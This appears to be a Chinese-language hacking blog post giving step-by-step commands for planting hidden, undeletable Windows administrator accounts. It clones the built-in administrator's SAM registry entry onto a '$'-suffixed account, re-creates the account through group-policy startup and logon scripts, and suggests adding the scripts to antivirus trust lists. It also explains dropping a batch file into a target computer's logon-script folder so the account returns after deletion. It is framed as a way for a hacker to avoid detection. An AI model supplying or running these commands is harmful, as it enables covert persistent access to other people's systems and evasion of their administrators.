实际操作：

（hklm\sam\sam文件夹默认system权限打开，如果以管理员身份操作，
需更改注册表 hklm\sam\sam文件夹的权限为administrators完全更改权限）
net user admin_user$ 123456 /add
net localgroup administrators admin_user$ /add
regedit /e c:\user$.reg hkey_local_machine\sam\sam\domains\account\users\names\admin_user$
regedit /e c:\3eb.reg hkey_local_machine\sam\sam\domains\account\users\000003EB
regedit /e c:\1f4.reg hkey_local_machine\sam\sam\domains\account\users\000001F4
type c:\1.reg     #等于Linux的cat命令
编辑1f4.reg，将其中的"F"=...把3eb.reg中对应部分替换
net user "admin user$" /del
regedit /s c:\1f4.reg
regedit /s c:\user$.reg
（现在可以用admin_user$登陆Windows了）#管理员权限，而且没有用户家目录
whoami /user   #查看本用户UID

链接：用批处理建立隐藏超级管理员账户

内容：@echo off
　　net user admin /add
　　这段命令相信大家都很熟悉了，“net user admin密码为：123的帐户
　　“net localgroup administrators admin加入管理员组。
　　regedit /e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
　　上面的命令的作用是导出“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”键值并存为C:\1.reg
　　net user admin
　　regedit /s c:\1.reg
　　导入1.reg
　　完成，把上面几段命令复制到文本文档，然后另存为任意文件名的bat文件运行即可。
　　（注：此方法建立的隐藏帐户，控制面板--用户内不会显示。计算机管理---用户和组里面也不会显示，DOS下无法删除，只有到“注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users下删除对应键值方可删除帐户）

但是，在重启电脑后，此方法隐藏的admin$ 用户名也会出现在计算机管理->用户和组->用户列表项中，也无法逃脱被发现的厄运（就黑客来说）。

我想一个黑客要不被发现，需要这样做：

在组策略设置开机时脚本：按下述方法添加隐藏用户（确保新建user$后已net user /del）；

regedit /s c:\1f4.reg
regedit /s c:\user$.reg

和关机时脚本：删除此隐藏账户。
问题是：需要改这个东西（hklm\sam\sam文件夹默认system权限打开，如果以管理员身份操作，
需更改注册表 hklm\sam\sam文件夹的权限为administrators完全更改权限）这样容易被有经验的管理员发现，而且如何隐藏脚本也是关键（可以在杀毒软件上添加信任）。

我的想法实践只成功了一半，计算机管理->用户和组->用户列表项中仍出现了该隐藏用户。

实测结果：开机脚本可以实现登录任意用户后均能添加管理员用户，不过会出现开机时有“运行脚本”的字样，一闪而过。
用户登录脚本发现只有管理员组及以上权限才可以添加管理员账户，未发现登录时有“运行脚本”字样，regedit 保存执行成功。
PS：开机脚本因为未将注册表路径设置正确，导致失败，我想注册表路径设置正确，也会成功，因为在注册表路径正确的情况下，登录脚本regedit 保存操作成功执行。

--------------------------------------------------------------------------------------------------------------

建立系统中别人永远删不掉的管理员用户只需做个小小的批处理
　　操作步骤：
　　1、在自己电脑里面建立一个.txt文本文件.
　　2、在里面输入内容
　　@echo off
　　net user hacker57 123456 /add 注释：前面hacker57是用户名后面123456是密码；
　　net localgroup administrators hacker57 /add
　　3、把这个文件保存，更改后缀为hacker57.bat 注释：前面名字随便，后面格式一定要是bat；
　　4、把这个文件拷贝到对方电脑C:\windows\system32\GroupPolicy\User\Scripts\Logon文件目录下，没有的话自己创建。

此目录是组策略》》Windows设置》脚本（登录）的地方

完成，下次对方电脑无论如何都有这个管理员帐号，删除了，下次启动还有！
　　如果把里面的内容改成
　　@echo off
　　net user administrator 123456 /add
　　意思是不管你怎么改，下次启动管理员帐号administrator密码一直是123456

参考链接：1、建立隐藏的超级用户---由《建立隐藏的超级用户》一文引出之“骗局”
2、 建立超级隐藏用户账户
3、WIN7系统设置隐藏用户
4、用批处理建立隐藏超级管理员账户

net user "admin user$" 123456 /add